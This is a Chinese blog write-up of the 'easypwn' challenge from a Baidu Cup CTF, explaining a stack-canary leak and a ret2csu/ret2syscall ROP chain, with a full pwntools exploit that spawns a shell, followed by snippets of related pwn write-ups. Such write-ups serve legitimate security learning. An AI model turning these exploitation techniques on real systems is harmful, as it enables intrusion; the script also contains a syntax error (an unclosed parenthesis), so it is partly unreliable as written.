“百度杯“ 十二月场 easypwn

最新推荐文章于 2024-03-12 21:30:23 发布
最新推荐文章于 2024-03-12 21:30:23 发布
阅读量692 收藏
点赞数
文章标签: 栈溢出 绕过canary
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baiyeguang/article/details/88556213
版权

题目链接

程序分析

查看程序保护机制
在这里插入图片描述
开启了canary保护,想办法绕过,这里选择泄露canary

在这里插入图片描述

可以看出canary的位置在[rbp-8]处,接着想办法泄露出[rbp-8]处数据
在这里插入图片描述
从源码中可以看出此处可以栈溢出,且canary位置为0x50-8,由于程序在接收到我们的输入之后会返回回来,所以如果我们可以覆盖掉canary低位的0x00就可以将canary一起打印出来,这里如果我们用sendline(‘b’*(0x50-8))就可将canary低位覆盖为0x0
a(空格的ascii码为0x0a)。这样canary就get了

之后就是构建合适的ropchain了,由于不知道libc的版本,所以我们先leak出read函数的地址,然后利用__libc_csu_init()函数来构建,__libc_csu_init()是x64下初始化libc的函数 ,详细可戳
学习大佬们的wp发现都用了ret2syscall,好像这样比较简单 ,ret2syscall学习链接

漏洞利用

1.用空格覆盖canary低位的0x00截断,打印出canary
2.泄露出read地址,然后得出syscall的地址
3.利用 __libc_csu_init()函数构建rop链来运行execve(’/bin/sh’,0,0)

exp

from pwn import*

context.binary = './easypwn'
context.terminal = ['tmux','sp','-h']
p=process('./easypwn')
#p=remote('106.75.2.53',10002)
elf=ELF('./easypwn')

p.recvuntil('Who are you?\n')
p.sendline('a'*(0x50-0x8))
p.recvuntil('a'*(0x50-0x8))
canary=u64(p.recv(8))-0xa
print 'canary: '+hex(canary)

prdi_ret=0x4007f3
main_addr=0x4006C6
read_got=elf.got['read']
puts_plt=elf.plt['puts']
p.recvuntil('tell me your real name?\n')
payload='a'*(0x50-0x8)
payload+=p64(canary)
payload+='a'*8
payload+=p64(prdi_ret)
payload+=p64(read_got)+p64(puts_plt)
payload+=p64(main_addr)
p.send(payload)

p.recvuntil('See you again!\n')
read_addr=u64(p.recvuntil('\n',drop=True).ljust(0x8,'\x00'))

print 'read_addr: '+hex(read_addr)
syscall=read_addr+0xe   #这里是一个syscall中断
print 'syscall: '+hex(syscall)
sleep(0.5)

ppppppr=0x4007ea
initaddr=0x4007d0
bss_addr=0x601070
p.recvuntil('Who are you?\n')
p.sendline('A'*(0x50-0x8))
p.recvuntil('tell me your real name?\n')
payload='a'*(0x50-0x8)
payload+=p64(canary)
payload+='a'*8
payload+=p64(ppppppr)
payload+=p64(0)+p64(1)+p64(read_got)+p64(0x3B)+p64(bss_addr)+p64(0)   #将/bin/sh写入到bss段
payload+=p64(initaddr
payload+=p64(0)
payload+=p64(0)+p64(1)+p64(bss_addr+8)+p64(0)+p64(0)+p64(bss_addr)
payload+=p64(initaddr)
p.send(payload)
sleep(0.5)

payload='/bin/sh\x00'+p64(syscall)  
payload=payload.ljust(0x3B,'a')
p.send(payload)


p.interactive()

我们知道execve的系统调用号为0x3B,而且read函数会返回读入数据的字节长度,并将这一结果放入eax,所以满足系统调用时eax中存放调用号这一限制,当程序执行bss_addr+8处内容(即syscall中断),加上之前我们将正确的参数传入寄存器中,即可执行execve(’/bin/sh’,0,0).

学习链接:
https://blog.csdn.net/aptx4869_li/article/details/81322632
https://www.ichunqiu.com/writeup/detail/519

F1Sh.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
百度”CTF比赛 十二月easypwn
红凳子的博客
04-04 532
百度”CTF比赛 十二月easypwn前言一、程序分析二、漏洞利用exploit 前言 在这篇文章中将学习到泄露canary、ret2scu和ret2syscall 一、程序分析 从中可以看出该程序为64位动态链接的ELF文件,开启了canary保护,需要想办法绕过绕过canary的方法分为两种,一种为直接泄露canary的值,另一种为覆盖canary的值。 这里选择泄露canary的值,可以看出canary的位置在[rbp-8h]处,接着想办法泄露出[rbp-8h]处数据。 从源码中可以
百度”CTF比赛(十二月)
Root__Liu的博客
04-13 4061
"百度"CTF比赛(十二月) 第一 1、传说中的签到题 解决:把二进制用在线进制转换器转换,发现转为10进制时,和tips2一样,在qq上一查,是CTF官方群,在公告里有一个字符串ZmxhZ3tiMTU5MDI4Yy05NWZmLTRmNzEtYWQ3Yi1jZWY1MTBhMjJkMDB9 用base64解码,得到flag, flag{b159028c-95ff-4f
百度”CTF比赛 十二月--Blog
Oavinci的博客
05-22 674
知识点: kindeditor编辑器遍历 insert注入 文件包含 扫描后台目录得到robots.txt 访问提示存在flag.php,访问得到 尝试注册账号admin,注册失败应该是已经存在,随便注册一个aaa/123登陆后发现post模块 尝试上传一张带一句话的图片后报错,得到路径: /kindeditor/php/upload_json.php 知道编辑版为kindeditor,搜索相关漏洞,得到利用姿势 /kindeditor/php/file_manager..
easypwn
zip471642048的博客
12-01 275
esaypwn
WICCTF-2021-easypwn
05-12
2021津门ctf的第一道pwn题。
roarctf_2019_easy_pwn
hanabi_sh
12-20 526
buuctf pwn roarctf_2019_easy_pwn off-by-one
Ichunqiu_Easypwn
钞sir的博客
01-28 4023
轮回池前彼岸花 三生石旁那道疤 擦不去的眼中莎 泪眼迷离失去她 https://cc-sir.github.io/2019/01/28/ichunqiu_easypwn/ 方法 这道题是i春秋CTF的一道题,也是“百度”CTF比赛 十二月中的一道pwn,这道题比较简单 我们先看看这道题的保护机制: sir@sir-PC:~/desktop$ checksec easypwn [*] '/ho...
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 341
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
攻防世界easypwn
weixin_44447516的博客
08-01 495
攻防世界 EasyPwn
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3011
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
攻防世界-PWN进阶区-EasyPwn(XCTF 4th-WHCTF-2017)
weixin_44145820的博客
03-04 1878
这题其实不算难,不过漏洞比较隐蔽,需要细心才能发现 题目分析 checksec: RELRO只是部分开启,考虑覆写GOT表 main: echo: 在该函数中存在一个溢出: v2的大小为1000(0x3E8),而我们的输入最大为0x438(输入缓冲区大小为0x400),如果我们的输入大于0x3E8,就会覆盖了v3的内容(%s),而%s是snprintf在向v2写入数据时格式化写入的数据的,如...
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3709
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 2532
攻防世界的格式化字符串漏洞利用,简单题
[BUUCTF]-PWN:roarctf_2019_easy_pwn解析
2301_79326813的博客
02-03 1402
先看保护64位,got表不可写看ida大致就是alloc创建堆块,fill填充堆块,free释放堆块,show输出堆块内容这里要注意的点有以下alloc创建堆块:这里采用的是calloc而不是malloc,calloc在创建堆块时会初始化也就是清空相应的内存空间,而malloc不会,这里使用calloc创建堆块fill填充堆块:这里它限制了填充的字节大小不得超过堆块大小,但如果填充大小正好大于堆块10字节的话,就可以多溢出一个字节,存在off by one漏洞。
攻防世界Easypwn-格式化字符串漏洞利用
aptx4869_li的博客
02-21 594
解题思路 基本信息查询 healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ readelf -h pwn1 ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's c
new-easy(pwn)
最新发布
m0_72827793的博客
03-12 1264
由于栈溢出攻击的主要目标通过溢出覆盖函数栈高位的返回地址,因此其思路是在函数开始执行前,即在返回地地址前写入一个字长的随机数据,在函数返回前校验该值是否被改变,如果被改变,则认为是发生了栈溢出。与ASLR保护十分类似,PIE保护的目的是让可执行程序ELF的地址进行随机化加载,从而使得程序的内存结构对攻击者完全未知,进一步提高程序的安全性。ASLR的目的是将程序的堆栈地址和动态链接库的加载地址进行一定的随机化,这些地址之间是不可读写执行的为映射内存,降低攻击者对程序内存结构的了解。
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 3801
攻防世界-Pwn-new-easypwn
两种保护机制:NX和Canary
weixin_46711318的博客
07-31 4388
因为自己学的比较慢,自学能力也比较差,假期过去挺久了,进度也才跟进到保护机制,可能接下来会花比较长的时间在这里。而保护机制我是从最简单的NX保护机制开始学起的,NX典型的例子有ret2syscall和libc,为了便于理解为什么有这种保护机制以及为什么需要这种保护机制,我去网上找了一些NX的原理。 NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行
i春秋上的几道pwn题
sopora的博客
06-17 1726
01.pwnme-50: Tag: fmtstr任意读 / 整型溢出 / ret2csu_init #encoding:utf-8 from pwn import * #context.log_level = 'debug' def leak(addr): io.sendafter('>', '2') io.sendafter('username...
2021年津门ctf线上赛记录(WICCTF)
lifanxin的博客
05-12 1943
津门ctf线上赛概述pwn题easypwnpwnCTFM总结 概述   本篇博客记录下自己的第一次ctf比赛经历,其实不完全是第一次,之前也参加过其他比赛,但只能做个签到就走了,这次不一样了,好歹做出了一道pwn题,有一道本来是有机会的,搞错libc了,线上没拿到flag,不过线上复现了下,感觉还行。因此特写下此篇博文,记录自己的一血。???? pwn题   我个人现在只会做做pwn题,后面打算也看看web,提升一下综合实力,这里介绍下比赛中的两道pwn题,和官方wp不一样,这里是我自己的思路。 easy
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值